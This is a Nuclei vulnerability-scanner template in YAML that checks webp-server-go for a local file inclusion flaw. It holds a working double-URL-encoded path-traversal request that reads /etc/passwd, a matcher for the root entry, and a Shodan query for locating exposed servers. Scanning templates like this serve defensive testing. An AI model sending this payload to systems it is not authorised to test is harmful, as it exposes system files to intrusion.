nuclei-templates/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml

35 lines
880 B
YAML

id: webp-server-go-lfi
info:
name: Webp server go - Local File Inclusion
author: pikpikcu
severity: high
description: Webp server go is vulnerable to local file inclusion.
reference:
- https://github.com/webp-sh/webp_server_go/issues/92
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.html:"Webp"
tags: lfi,webp
requests:
- method: GET
path:
- "{{BaseURL}}/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15